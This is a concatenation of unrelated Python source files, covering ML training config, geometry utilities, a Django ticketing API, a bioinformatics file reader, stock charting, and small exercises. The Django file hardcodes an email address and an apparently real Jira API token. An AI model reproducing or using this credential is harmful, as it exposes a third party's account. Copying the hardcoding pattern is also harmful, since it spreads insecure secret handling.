dataset = FilesFromCsvDataset("output/unique_filtered_train_dataset.csv")
TRAIN_LOADER = get_data_loader(dataset,
data_transform=TRAIN_TRANSFORMS,
batch_size=BATCH_SIZE,
num_workers=NUM_WORKERS,
pin_memory='cuda' in DEVICE)
val_dataset = FilesFromCsvDataset("output/unique_filtered_val_dataset.csv")
VAL_LOADER = get_data_loader(val_dataset,
data_transform=VAL_TRANSFORMS,
batch_size=BATCH_SIZE,
num_workers=NUM_WORKERS,
pin_memory='cuda' in DEVICE)
base_model = inceptionv4(num_classes=1000, pretrained='imagenet')
MODEL = FurnitureModelOnCrops(features=base_model.features, featuremap_output_size=1536, n_cls_layers=1024)
N_EPOCHS = 100
OPTIM = Adam(
params=[
{"params": MODEL.base_features.parameters(), 'lr': 0.0001},
{"params": MODEL.crop_classifiers.parameters(), 'lr': 0.001},
{"params": MODEL.final_classifier.parameters(), 'lr': 0.002},
],
)
LR_SCHEDULERS = [
MultiStepLR(OPTIM, milestones=list(range(5, 50, 2)), gamma=0.8)
]
# REDUCE_LR_ON_PLATEAU = ReduceLROnPlateau(OPTIM, mode='min', factor=0.5, patience=5, threshold=0.05, verbose=True)
EARLY_STOPPING_KWARGS = {
'patience': 30,
# 'score_function': None
}
LOG_INTERVAL = 100
|
import numpy as np
import numba as nb
@nb.njit(cache=True)
def as_rect(tlbr):
tlbr = np.asarray(tlbr, np.float64)
tlbr = np.rint(tlbr)
return tlbr
@nb.njit(cache=True)
def get_size(tlbr):
tl, br = tlbr[:2], tlbr[2:]
size = br - tl + 1
return size
@nb.njit(cache=True)
def area(tlbr):
size = get_size(tlbr)
return int(size[0] * size[1])
@nb.njit(cache=True)
def mask_area(mask):
return np.count_nonzero(mask)
@nb.njit(cache=True)
def get_center(tlbr):
xmin, ymin, xmax, ymax = tlbr
return np.array([(xmin + xmax) / 2, (ymin + ymax) / 2])
@nb.njit(cache=True)
def to_tlwh(tlbr):
return np.append(tlbr[:2], get_size(tlbr))
@nb.njit(cache=True)
def to_tlbr(tlwh):
tlwh = np.asarray(tlwh, np.float64)
tlwh = np.rint(tlwh)
tl, size = tlwh[:2], tlwh[2:]
br = tl + size - 1
return np.append(tl, br)
@nb.njit(cache=True)
def intersection(tlbr1, tlbr2):
tl1, br1 = tlbr1[:2], tlbr1[2:]
tl2, br2 = tlbr2[:2], tlbr2[2:]
tl = np.maximum(tl1, tl2)
br = np.minimum(br1, br2)
tlbr = np.append(tl, br)
if np.any(get_size(tlbr) <= 0):
return None
return tlbr
@nb.njit(cache=True)
def union(tlbr1, tlbr2):
tl1, br1 = tlbr1[:2], tlbr1[2:]
tl2, br2 = tlbr2[:2], tlbr2[2:]
tl = np.minimum(tl1, tl2)
br = np.maximum(br1, br2)
tlbr = np.append(tl, br)
return tlbr
@nb.njit(cache=True)
def crop(img, tlbr):
xmin, ymin, xmax, ymax = tlbr.astype(np.int_)
return img[ymin:ymax + 1, xmin:xmax + 1]
@nb.njit(cache=True)
def multi_crop(img, tlbrs):
tlbrs_ = tlbrs.astype(np.int_)
return [img[tlbrs_[i][1]:tlbrs_[i][3] + 1, tlbrs_[i][0]:tlbrs_[i][2] + 1]
for i in range(len(tlbrs_))]
@nb.njit(fastmath=True, cache=True)
def iom(tlbr1, tlbr2):
"""
Computes intersection over minimum.
"""
tlbr = intersection(tlbr1, tlbr2)
if tlbr is None:
return 0.
area_intersection = area(tlbr)
area_minimum = min(area(tlbr1), area(tlbr2))
return area_intersection / area_minimum
@nb.njit(fastmath=True, cache=True)
def transform(pts, m):
"""
Numba implementation of OpenCV's transform.
"""
pts = np.asarray(pts)
pts = np.atleast_2d(pts)
augment = np.ones((len(pts), 1))
pts = np.concatenate((pts, augment), axis=1)
return pts @ m.T
@nb.njit(fastmath=True, cache=True)
def perspective_transform(pts, m):
"""
Numba implementation of OpenCV's perspectiveTransform.
"""
pts = np.asarray(pts)
pts = np.atleast_2d(pts)
augment = np.ones((len(pts), 1))
pts = np.concatenate((pts, augment), axis=1).T
pts = m @ pts
pts = pts / pts[-1]
return pts[:2].T
@nb.njit(fastmath=True, cache=True)
def nms(tlwhs, scores, nms_thresh):
"""
Applies the Non-Maximum Suppression algorithm on the bounding boxes [x, y, w, h]
with their confidence scores and return an array with the indexes of the bounding
boxes we want to keep
"""
areas = tlwhs[:, 2] * tlwhs[:, 3]
ordered = scores.argsort()[::-1]
tl = tlwhs[:, :2]
br = tlwhs[:, :2] + tlwhs[:, 2:] - 1
keep = []
while ordered.size > 0:
# index of the current element
i = ordered[0]
keep.append(i)
# compute IOU
candidate_tl = tl[ordered[1:]]
candidate_br = br[ordered[1:]]
overlap_xmin = np.maximum(tl[i, 0], candidate_tl[:, 0])
overlap_ymin = np.maximum(tl[i, 1], candidate_tl[:, 1])
overlap_xmax = np.minimum(br[i, 0], candidate_br[:, 0])
overlap_ymax = np.minimum(br[i, 1], candidate_br[:, 1])
width = np.maximum(0, overlap_xmax - overlap_xmin + 1)
height = np.maximum(0, overlap_ymax - overlap_ymin + 1)
area_intersection = width * height
area_union = areas[i] + areas[ordered[1:]] - area_intersection
iou = area_intersection / area_union
idx = np.where(iou <= nms_thresh)[0]
ordered = ordered[idx + 1]
keep = np.asarray(keep)
return keep
|
from .models import *
from django.http import HttpResponse
from .serializers import *
import datetime
from django.http import JsonResponse
from django.core.mail import BadHeaderError, send_mail
from datetime import date,timedelta
import json
from django.conf import settings
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from rest_framework_simplejwt.authentication import JWTAuthentication
from django.core import serializers
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import generics
from jira import JIRA
auth_jira = JIRA('https://cogniable.atlassian.net', basic_auth=('kohlimanu@gmail.com', 'QbvAH5jVtFrMykcKfgq8A81E'))
class CreateTicket(APIView):
authentication_classes = (JWTAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = TicketsSerializer
def get(self, request, format=None):
ticket_obj = Tickets.objects.all()
serializer = self.serializer_class(ticket_obj, many=True)
res_dict = {}
res_dict['status'] = 1
res_dict['detail'] = "tickets Api"
res_dict['data'] = serializer.data
return Response(res_dict, status=status.HTTP_200_OK)
def post(self, request, format=None):
serializer = TicketsSerializer(data=request.data)
if serializer.is_valid():
serializer.save(status=TicketStatus.objects.get(id=1))
assign_to = serializer.validated_data.get('assign_to')
subject = serializer.validated_data.get('subject')
description = serializer.validated_data.get('description')
assign_to = serializer.validated_data.get('assign_to')
attachments = serializer.validated_data.get('attachments')
res_dict = {}
res_dict['status'] = 1
res_dict['detail'] = "Ticket ceated Successfully"
return Response(res_dict, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) |
# Copyright (c) 2008, Michigan State University.
"""Reader and writer for screed."""
from __future__ import absolute_import
import os
import io
import sys
import gzip
import bz2
from collections.abc import MutableMapping
try:
import sqlite3
except ImportError:
pass
from . import DBConstants
from . import screedRecord
from .fastq import fastq_iter
from .fasta import fasta_iter
from .utils import to_str
def _normalize_filename(filename):
"""Map '-' to '/dev/stdin' to handle the usual shortcut."""
if filename == '-':
filename = '/dev/stdin'
return filename
class Open(object):
def __init__(self, filename, *args, **kwargs):
self.sequencefile = None
self.iter_fn = self.open_reader(filename, *args, **kwargs)
if self.iter_fn:
self.__name__ = self.iter_fn.__name__
def open_reader(self, filename, *args, **kwargs):
"""
Make a best-effort guess as to how to parse the given sequence file.
Handles '-' as shortcut for stdin.
Deals with .gz, FASTA, and FASTQ records.
"""
magic_dict = {
b"\x1f\x8b\x08": "gz",
b"\x42\x5a\x68": "bz2",
# "\x50\x4b\x03\x04": "zip"
} # Inspired by http://stackoverflow.com/a/13044946/1585509
filename = _normalize_filename(filename)
bufferedfile = io.open(file=filename, mode='rb', buffering=8192)
num_bytes_to_peek = max(len(x) for x in magic_dict)
file_start = bufferedfile.peek(num_bytes_to_peek)
compression = None
for magic, ftype in magic_dict.items():
if file_start.startswith(magic):
compression = ftype
break
if compression == 'bz2':
sequencefile = bz2.BZ2File(filename=bufferedfile)
peek = sequencefile.peek(1)
elif compression == 'gz':
if not bufferedfile.seekable():
bufferedfile.close()
raise ValueError("gziped data not streamable, pipe "
"through zcat first")
peek = gzip.GzipFile(filename=filename).read(1)
sequencefile = gzip.GzipFile(filename=filename)
bufferedfile.close()
else:
peek = bufferedfile.peek(1)
sequencefile = bufferedfile
iter_fn = None
try:
first_char = peek[0]
except IndexError as err:
return [] # empty file
try:
first_char = chr(first_char)
except TypeError:
pass
if first_char == '>':
iter_fn = fasta_iter
elif first_char == '@':
iter_fn = fastq_iter
if iter_fn is None:
raise ValueError("unknown file format for '%s'" % filename)
self.sequencefile = sequencefile
return iter_fn(sequencefile, *args, **kwargs)
def __enter__(self):
return self.iter_fn
def __exit__(self, *exc_info):
self.close()
def __iter__(self):
if self.iter_fn:
return self.iter_fn
return iter(())
def close(self):
if self.sequencefile is not None:
self.sequencefile.close()
class ScreedDB(MutableMapping):
"""
Core on-disk dictionary interface for reading screed databases. Accepts a
path string to a screed database
"""
def __init__(self, filepath):
self._db = None
try:
sqlite3
except NameError:
raise Exception("error: sqlite3 is needed for this " +
"functionality, but is not installed.")
self._filepath = filepath
if not self._filepath.endswith(DBConstants.fileExtension):
self._filepath += DBConstants.fileExtension
if not os.path.exists(self._filepath):
raise ValueError('No such file: %s' % self._filepath)
self._db = sqlite3.connect(self._filepath)
cursor = self._db.cursor()
# Make sure the database is a prepared screed database
query = "SELECT name FROM sqlite_master WHERE type='table' "\
"ORDER BY name"
res = cursor.execute(query)
try:
dictionary_table, = res.fetchone()
admin_table, = res.fetchone()
if dictionary_table != DBConstants._DICT_TABLE:
raise TypeError
if admin_table != DBConstants._SCREEDADMIN:
raise TypeError
except TypeError:
self._db.close()
raise TypeError("Database %s is not a proper screed database"
% self._filepath)
nothing = res.fetchone()
if nothing is not None:
self._db.close()
raise TypeError("Database %s has too many tables." % filename)
# Store the fields of the admin table in a tuple
query = "SELECT %s, %s FROM %s" % \
(DBConstants._FIELDNAME,
DBConstants._ROLENAME,
DBConstants._SCREEDADMIN)
res = cursor.execute(query)
self.fields = tuple([(str(field), role) for field, role in res])
# Indexed text column for querying, search fields to find
self._queryBy = self.fields[1][0]
for fieldname, role in self.fields:
if role == DBConstants._INDEXED_TEXT_KEY:
self._queryBy = fieldname
# Sqlite PRAGMA settings for speed
cursor.execute("PRAGMA cache_size=2000")
# Retrieve the length of the database
query = 'SELECT MAX(%s) FROM %s' % (DBConstants._PRIMARY_KEY,
DBConstants._DICT_TABLE)
self._len, = cursor.execute(query).fetchone()
def __del__(self):
"""
Alias for close()
"""
self.close()
def close(self):
"""
Closes the sqlite database handle
"""
if self._db is not None:
self._db.close()
self._db = None
def __getitem__(self, key):
"""
Retrieves from database the record with the key 'key'
"""
cursor = self._db.cursor()
key = str(key) # So lazy retrieval objectes are evaluated
query = 'SELECT %s FROM %s WHERE %s=?' % (self._queryBy,
DBConstants._DICT_TABLE,
self._queryBy)
res = cursor.execute(query, (key,))
if res.fetchone() is None:
raise KeyError("Key %s not found" % key)
return screedRecord._buildRecord(self.fields, self._db,
key,
self._queryBy)
def values(self):
"""
Retrieves all records from the database and returns them as a list
"""
return list(self.itervalues())
def items(self):
"""
Retrieves all records from the database and returns them as a list of
(key, record) tuple pairs
"""
return list(self.iteritems())
def loadRecordByIndex(self, index):
"""
Retrieves record from database at the given index
"""
cursor = self._db.cursor()
index = int(index) + 1 # Hack to make indexing start at 0
query = 'SELECT %s FROM %s WHERE %s=?' % (DBConstants._PRIMARY_KEY,
DBConstants._DICT_TABLE,
DBConstants._PRIMARY_KEY)
res = cursor.execute(query, (index,))
if res.fetchone() is None:
raise KeyError("Index %d not found" % index)
return screedRecord._buildRecord(self.fields, self._db,
index,
DBConstants._PRIMARY_KEY)
def __len__(self):
"""
Returns the number of records in the database
"""
return self._len
def keys(self):
"""
Returns a list of keys in the database
"""
return list(self.iterkeys())
def __repr__(self):
"""
Returns a string with some general information about the database
"""
return "<%s, '%s'>" % (self.__class__.__name__,
self._filepath)
def itervalues(self):
"""
Iterator over records in the database
"""
for index in range(1, self.__len__() + 1):
yield screedRecord._buildRecord(self.fields, self._db,
index,
DBConstants._PRIMARY_KEY)
def iterkeys(self):
"""
Iterator over keys in the database
"""
cursor = self._db.cursor()
query = 'SELECT %s FROM %s ORDER BY id' % (
self._queryBy, DBConstants._DICT_TABLE)
for key, in cursor.execute(query):
yield key
def __iter__(self):
return self.iterkeys()
def iteritems(self):
"""
Iterator returning a (index, record) pairs
"""
for v in self.itervalues():
yield v[DBConstants._PRIMARY_KEY], v
def has_key(self, key):
"""
Returns true if given key exists in database, false otherwise
"""
return key in self
def copy(self):
"""
Returns shallow copy
"""
return self
def __contains__(self, key):
"""
Returns true if given key exists in database, false otherwise
"""
cursor = self._db.cursor()
query = 'SELECT %s FROM %s WHERE %s = ?' % \
(self._queryBy, DBConstants._DICT_TABLE, self._queryBy)
if cursor.execute(query, (key,)).fetchone() is None:
return False
return True
# Here follow the methods that are not implemented
def __setitem__(self, something):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def __delitem__(self, something):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def clear(self):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def update(self, something):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def setdefault(self, something):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def pop(self):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
def popitem(self):
"""
Not implemented (Read-only database)
"""
raise NotImplementedError
|
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.core.urlresolvers import reverse
from models import Post
def main(request):
posts = Post.objects.all().order_by("-created")
paginator = Paginator(posts,2)
try:
page = int(request.GET.get("page",'1'))
except ValueError:
page = 1
try:
posts = paginator.page(page)
except (InvalidPage, EmptyPage):
posts = paginator.page(paginator.num_pages)
return render_to_response("list.html",dict(posts=posts, user=request.user))
# Create your views here.
|
from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination
class ArticleLimitOffsetPagination(LimitOffsetPagination):
default_limit = 2
max_limit = 3
class ArticlePageNumberPagination(PageNumberPagination):
page_size = 2
|
import main
from argparse import Namespace
# for submission in api.getContestSubmissions(1003,'minhphuoc1998'):
# print(submission['id'])
# api.API.getContestResult(1003,'minhphuoc1998')
# print(api.API.getContestInfo(1003))
# This equal to :
# python main.py -contests 1003 1004 1005 -users ferez.96 minhphuoc1998
args = Namespace(contests=[1003, 1004, 1005], users=['ferez.96', 'minhphuoc1998'])
main.main(args)
|
#主要看内存地址变化没,可变类型,不可变类型
#显示data是100,函数调用后a也是100,a后来赋值200,是不可变类型,现在就是data是100,a是200
# def test1(a):
# a = 200
# print('test1--- %d' % a)
# data = 100 # data 是一个数字
# test1(data)
# print('main --- %d' % data)
#列表是可变类型,data是[11],a是[11],a.append(22),内存地址不变,data和a一样
# def test1(a):
# a.append(22)
# print('test1--- %s' % a)
# data = [11] # data 是一个列表
# test1(data)
# print('main --- %s' % data)
#开始data是[11],a是[11],后来a赋值[],内存地址变了,data没变,a是[22]
def test1(a):
a = []
a.append(22)
print('test1--- %s' % a)
data = [11] # data 是一个列表
test1(data)
print('main --- %s' % data)
#函数内修改i全局变量
# def test1(a):
# global data
# data = [22]
# print('test1--- %s' % data)
# data = [11] # data 是一个列表
# test1(data)
# print('main --- %s' % data) |
from snack import *
import gettext
#import os
class Menu:
def __init__(self, texto, ancho=60, altomenu=25, opciones=None, titulo='',
scroll=0, screen=None, posicion=0):
self.texto = texto
self.titulo = titulo
self.screen = screen
self.altomenu = altomenu
self.scroll = scroll
if (self.titulo == ""):
self.titulo = gettext.gettext("No title")
self.items = []
for item in opciones:
self.items.append(item)
if (len(self.items) > self.altomenu):
self.scroll = 1
def showMenu(self):
(self.button, rta) = ListboxChoiceWindow(self.screen,
self.titulo,
self.texto,
self.items,
width=65,
height=17,
help=None)
if (self.button == 'cancel'):
self.screen.finish()
rta = None
return rta
|
import getopt
import sys
from datetime import datetime, timedelta
WIN_OUTPUT_DIR_PATH = r"D:\flo2d_output"
try:
buf_size = 65536
GRID_SIZE = 250
INPUT = '2016May'
try:
opts, args = getopt.getopt(sys.argv[1:], "s:e:i:g:",
["start=", "end=", "input=", "grid="])
except getopt.GetoptError as er:
print('GetoptError : ', er)
print('opts : ', opts)
print('args : ', args)
sys.exit(2)
for opt, arg in opts:
if opt in ("-s", "--start"):
START_HOUR = float(arg)
elif opt in ("-e", "--end"):
END_HOUR = float(arg)
elif opt in ("-i", "--input"):
INPUT = arg
elif opt in ("-g", "--grid"):
GRID_SIZE = int(arg)
RUN_DATE = datetime.datetime.now().strftime("%Y-%m-%d")
RUN_DATE = datetime.datetime.strptime(RUN_DATE, '%Y-%m-%d')
MODEL_FOLDER = 'input/{}/'.format(INPUT)
TIMEDEP_FILE_PATH = MODEL_FOLDER + 'TIMDEP.OUT'
CADPTS_DAT_FILE_PATH = MODEL_FOLDER + 'CADPTS.DAT'
WATER_LEVEL_FILE = 'water_level.asc'
ASCII_DIR = MODEL_FOLDER + 'ASCII'
START_HOUR = 0.00
END_HOUR = 96.00
WATER_LEVEL_DEPTH_MIN = 0.15
except Exception as e:
print("Exception|e : ", e)
|
#finalgraph.py
import urllib2
import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
import matplotlib.dates as mdates
from matplotlib.finance import candlestick #candlestick
import matplotlib.animation as animation
import matplotlib
import pylab
matplotlib.rcParams.update({'font.size':9})
def rsiFunc(prices, n=14): #n= time period
#it tells you a stock is either overbought or over sold i.e. over 70-over bought,
#and vice versa #relative strength = (average gain -average lost)/n
deltas = np.diff(prices) #different in prices
seed = deltas[:n+1]
up = seed[seed>=0].sum()/n
down = -seed[seed<0].sum()/n
rs =up/down
rsi=np.zeros_like(prices)
rsi[:n]=100 - 100/(1+rs)
#rsi up to that time period
for i in range(n, len(prices)):
delta = deltas[i-1]
if delta > 0:
upval = delta
downval = 0
else:
upval=0
downval = -delta
up=(up*(n-1)+upval)/n
down =(down*(n-1)+downval)/n
rs=up/down
rsi[i]=100-100/(1+rs)
return rsi
def movingAverage(values, window): #values-data, window-timeframe
weights = np.repeat(1.0, window)/window
smas = np.convolve(values, weights, 'valid') #smooths the line
return smas #list of stuff in numpy array
def expMovingAverage(values, window):
#weight more closer data to recent data
weights = np.exp(np.linspace(-1.0,0.0, window))
weights /= weights.sum()
a = np.convolve(values, weights, mode='full')[:len(values)]
a[:window] = a[window]
return a
def computeMACD(x, slow=26, fast = 12):# 12 period and 26 periods
'''
macd line = 12EMA -26 EMA(expotentail moving average)
signal line = 9EMA of the Macdline
histogram = macd line - signal line
'''
emaslow = expMovingAverage(x, slow)
emafast = expMovingAverage(x, fast)
return emaslow, emafast, emafast-emaslow
def graphData(stock, MA1, MA2):
fig.clf() #moving average 1, moving average 2
try:
try:
print'pulling data on', stock, 'at', str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
urlToVisit = 'http://chartapi.finance.yahoo.com/instrument/1.0/'+stock+'/chartdata;type=quote;range=3d/csv'
stockFile=[]
try:
sourceCode=urllib2.urlopen(urlToVisit).read()
splitSource= sourceCode.split('\n')
for eachLine in splitSource:
splitLine = eachLine.split(',')
fixMe = splitLine[0]
if len(splitLine)==6:
if 'values' not in eachLine:
fixed = eachLine.replace(fixMe, str(datetime.datetime.fromtimestamp(int(fixMe)).strftime('%Y-%m-%d %H:%M:%S')))
stockFile.append(fixed)
except Exception, e:
print str(e), 'failed to organize pulled data'
except Exception, e:
print str(e), 'failed to pull price data'
## stockFile = 'oneDayOHLC/'+stock+ '.txt'
date, closep, highp, lowp, openp, volume = np.loadtxt(stockFile, delimiter=',', unpack=True,
converters={ 0:mdates.strpdate2num('%Y-%m-%d %H:%M:%S')})
####
x = 0
y = len(date)
candleAr = []
while x<y:
appendLine = date[x],openp[x], closep[x], highp[x],lowp[x],volume[x]
candleAr.append(appendLine)
x+=1
#build the array
#(openp, closep, highp, lowp, volume)
#only open p and close p candlestick
Av1 = movingAverage(closep, MA1) #use the close value
Av2 = movingAverage(closep, MA2)
SP = len(date[MA2-1:])
#starting point #can mess around with MA2 and the length
label1=str(MA1)+' daysMovingAverage'
label2=str(MA2)+' daysMA'
#off black #background color
#ax1 is the stock price graph
ax1 = plt.subplot2grid((6,4),(1,0), rowspan=4, colspan=4,axisbg='#07000d')
candlestick(ax1, candleAr[-SP:], width=.00001,colorup='#54C156',colordown='#ff1717') #-SP to have average value on all candlesticks
ax1.plot(date[-SP:],Av1[-SP:],color='#e1edf9',label=label1, linewidth=1.0) #color white blue ish
ax1.plot(date[-SP:],Av2[-SP:],color='#4ee6fd',label=label2, linewidth=1.0) #off white#e1edf9
####
ax1.grid(True, color='w')
#when it goes up-green(g). when it goes down it is red(r)
#DATA=the format is important
#already did that with the while loop
ax1.grid(True) #we want that grid
ax1.xaxis.set_major_locator(mticker.MaxNLocator(31)) # number here is the interval
ax1.xaxis.set_major_formatter(mdates.DateFormatter('%y%m%d %H:%M'))
plt.gca().yaxis.set_major_locator(mticker.MaxNLocator(prune='upper'))
ax1.yaxis.label.set_color('w')
ax1.spines['bottom'].set_color('#5998ff')
ax1.spines['top'].set_color('#5998ff')
ax1.spines['left'].set_color('#5998ff')
ax1.spines['right'].set_color('#5998ff')#ligt blue
ax1.tick_params(axis='y', colors='w')
ax1.tick_params(axis='x', colors='w')
plt.ylabel(stock+"'s Stock Price and Volume")
maLeg = plt.legend(loc=9, ncol=2, prop={'size':7}, fancybox=True)
maLeg.get_frame().set_alpha(0.4)
textEd = pylab.gca().get_legend().get_texts()
pylab.setp(textEd[0:5], color ='w') #can have more than 5 moving average
#ax0 is the RSI graph
ax0 = plt.subplot2grid((6,4),(0,0),sharex=ax1, rowspan=1, colspan=4,axisbg='#07000d')
rsiCol = '#c1f9f7'
posCol= '#386d13'
negCol='#8f2020'
rsi = rsiFunc(closep) #close price #can change the closep #can have more than 14 days(defaulted)
#can try average
#can try average average(more complicated than just average)
#can try open p and openp-closep
ax0.plot(date[-SP:], rsi[-SP:], rsiCol, linewidth=1.5)
ax0.axhline(70,color = negCol)
ax0.axhline(30, color = posCol)
ax0.fill_between(date[-SP:], rsi[-SP:], 70, where=(rsi[-SP:]>=70), facecolor=negCol, edgecolor= negCol)
ax0.fill_between(date[-SP:], rsi[-SP:], 30, where=(rsi[-SP:]<=30), facecolor=posCol, edgecolor= posCol)
ax0.set_ylim(0,100) #range for rsi is 100
ax0.spines['bottom'].set_color('#5998ff')
ax0.spines['top'].set_color('#5998ff')
ax0.spines['left'].set_color('#5998ff')
ax0.spines['right'].set_color('#5998ff')
ax0.text(0.00000001, 0.99995, 'RSI(14)', va='center', color='w', transform=ax0.transAxes)
#14 is hardcoded. it can be put in other variables
ax0.tick_params(axis='x', colors='w')
ax0.tick_params(axis='y', colors='w')
ax0.set_yticks([30,70])
ax0.yaxis.label.set_color('w')
# plt.gca().yaxis.set_major_locator(mticker.MaxNLocator(prune='upper'))
plt.ylabel('RSI')
volumeMin = 0 #volume.min() #how low to filler
####
#ax1v(olume) is the stock's volume graph
ax1v = ax1.twinx() #volume axis share the xaxis #the volume axis #overlay
#usually ppl just look at the amplitude
ax1v.fill_between(date[-SP:],volumeMin,volume[-SP:], facecolor='#00ffe8', alpha=.5) #fill
ax1v.axes.yaxis.set_ticklabels([])
ax1v.grid(False)
ax1v.spines['bottom'].set_color('#5998ff')
ax1v.spines['top'].set_color('#5998ff')
ax1v.spines['left'].set_color('#5998ff')
ax1v.spines['right'].set_color('#5998ff')
ax1v.set_ylim(0,3.5*volume.max()) #how the volume axis dominates the graph
ax1v.tick_params(axis='x', colors='w')
ax1v.tick_params(axis='y', colors='w')
plt.subplots_adjust(left=0.09, bottom=.18, right=.95, top=.94, wspace=.20,hspace=0)
plt.xlabel('Date', color='w')
#ax2 is for the MACD graph
ax2 = plt.subplot2grid((6,4), (5,0), sharex=ax1, rowspan=1, colspan=4,axisbg='#07000d')
fillcolor='#00ffe8'
nslow = 26
nfast = 12
nema=9
emaslow, emafast, macd = computeMACD(closep) #usign closep
ema9 = expMovingAverage(macd, nema) #macd?
plt1 = ax2.plot(date[-SP:], macd[-SP:],color='#4eeffd', lw=2)
plt2 = ax2.plot(date[-SP:], ema9[-SP:],color='#e1edf9', lw=1)
ax2.fill_between(date[-SP:], macd[-SP:]-ema9[-SP:], 0, alpha=0.55, facecolor = fillcolor, edgecolor=fillcolor)
## ax2.text(0.5, 0.95, 'MACD 12, 26, 9', va= 'bottom', color='w', transform=ax2.transAxes)
ax2.spines['bottom'].set_color('#5998ff')
ax2.spines['top'].set_color('#5998ff')
ax2.spines['left'].set_color('#5998ff')
ax2.spines['right'].set_color('#5998ff')
ax2.tick_params(axis='x', colors='w')
ax2.tick_params(axis='y', colors='w')
plt.ylabel('MACD', color='w')
##
ax2.legend(('MACD', 'EMA9'), loc='lower left',prop={'size':5.5}, fancybox = True, framealpha = 0.5)
ax1.text(0.001, 0.05,str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')+' Current Price: '+str(round(closep[-1],3))), va='top', color='yellow', transform=ax1.transAxes)
ax2.yaxis.set_major_locator(mticker.MaxNLocator(nbins=5,prune='upper'))
for label in ax2.xaxis.get_ticklabels():
label.set_rotation(45)
for i in range(int(len(date))-int(SP), int(len(date))):
#this can be imporved a lot; like where exactly interesection happens
##THIS JUST PROVED THE EXISTENCE OF THE INERSECTION
if macd[i]>ema9[i] and macd[i-1]<ema9[i-1]:
ax2.plot((date[i]+date[i-1])/2, (macd[i]+ema9[i])/2, 'ro')
if macd[i]<ema9[i] and macd[i-1]>ema9[i-1]:
ax2.plot((date[i]+date[i-1])/2, (ema9[i]+macd[i])/2, 'go')
else:
continue
if closep[-1]>closep[-2]:
fig.patch.set_facecolor('#333300')
elif closep[-1]< closep[-2]:
fig.patch.set_facecolor('#600000')
else:
fig.patch.set_facecolor('w')
ax0.text(0.001, 0.05, str(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')+' Current RSI: '+str(round(rsi[-1],3))), va='center', color='yellow', transform=ax0.transAxes)
ax2.text(0.01, 0.95,'MACD 12, 26, 9 -- '+str(datetime.datetime.fromtimestamp(time.time()).strftime('%H:%M:%S')+' Current MACD: '+str(round(macd[-1],3))), va='center', color='yellow', transform=ax2.transAxes)
plt.suptitle(stock, color='w')
plt.setp(ax0.get_xticklabels(), visible=False)
plt.setp(ax1.get_xticklabels(), visible=False)
## plt.show()
## fig.savefig('Example2WithNotCandlestick.png', facecolor=fig.get_facecolor()) #save the figure after you cross it
except Exception, e:
print 'Failed main loop--', str(e)
###
fig = plt.figure(facecolor='#07000d')
def animate(i):
graphData(stockToUse,12,26) #12 periods and 26 periods
while True:
stockToUse = raw_input('Stock to Chart: ')
ani = animation.FuncAnimation(fig, animate, interval = 60000)
plt.show()
## time.sleep(3600)
|
def mode(nums):
"""Return most-common number in list.
For this function, there will always be a single-most-common value;
you do not need to worry about handling cases where more than one item
occurs the same number of times.
>>> mode([1, 2, 1])
1
>>> mode([2, 2, 3, 3, 2])
2
"""
curr = {'start':0}
for el in nums:
count = {el: 0}
for num in nums:
if num == el:
count[el] += 1
if count[el] > list(curr.values())[0]:
curr = count
return list(curr.keys())[0]
print(mode([1, 2, 1]))
print(mode([2, 2, 3, 3, 2]))
|
from collections import deque
N, A, B = map(int, input().split())
# [0] = 현 위치, [1] = timeline, [2] = 어떤 동물의 접근이지 파악 목적 0 오리, 1 육리
queue = deque()
queue.append([A, 1, 0])
queue.append([B, 1, 1])
# 이동 와중에 동시성만 챙기면 되니, timeline만 확인 어차피 한번 지나간 시간은 중복되지 않으니 중복될 걱정 X
time = [[1] * (N+1) for _ in range(2)]
flag = False
while queue and not flag:
cur_pos, timeline, kind= queue.popleft()
for elm in [-2**(timeline-1), 2**(timeline-1)]:
if cur_pos + elm < 1 or cur_pos + elm > N: continue
if time[kind^1][cur_pos + elm] == timeline + 1:
print(timeline)
flag = True
break
queue.append([cur_pos + elm, timeline + 1, kind])
time[kind][cur_pos + elm] = timeline + 1
if not flag: print(-1) |
# coding: utf-8
# Es el año 2049 y todavía existen las loterias, esta particular sortea con numeros de 16 bits todos los días a la medianoche. La leyenda cuenta que esta implementada en assembler de 6502, y sospechamos que el generador de numeros al azar no sería fuerte.
#
# A continucación estan los resultados para el dia 17/06/2049, donde 0x0ce9 se lleva el premio mayor y 0x99dc es el segundo premio.
#
# Cuales serán los numeros que se lleven el premio mayor para los próximos 4 días ?
#
# Podes encontrar el adjunto en https://s3.amazonaws.com/it.challenge/level5.txt
# vim: set ts=4 sw=4 tw=79 et :
|
import asyncio
from time import time
from ew.static import cfg as ewcfg
from ew.static import poi as poi_static
from ew.utils import core as ewutils
from ew.utils import frontend as fe_utils
from ew.utils import rolemgr as ewrolemgr
from ew.utils.combat import EwUser
from ew.utils.district import EwDistrict
from ew.backend.dungeons import EwGamestate
from ew.backend.item import EwItem
from ew.backend import item as bknd_item
try:
from ew.cmd import debug as ewdebug
except:
from ew.cmd import debug_dummy as ewdebug
"""
Informs the player about their current zone's capture progress
"""
async def capture_progress(cmd):
user_data = EwUser(member=cmd.message.author)
response = ""
poi = poi_static.id_to_poi.get(user_data.poi)
response += "**{}**: ".format(poi.str_name)
if not user_data.poi in poi_static.capturable_districts:
response += "This zone cannot be captured."
return await fe_utils.send_message(cmd.client, cmd.message.channel, fe_utils.formatMessage(cmd.message.author, response))
district_data = EwDistrict(id_server=user_data.id_server, district=user_data.poi)
percent_progress_after = int(district_data.capture_points / district_data.max_capture_points * 100)
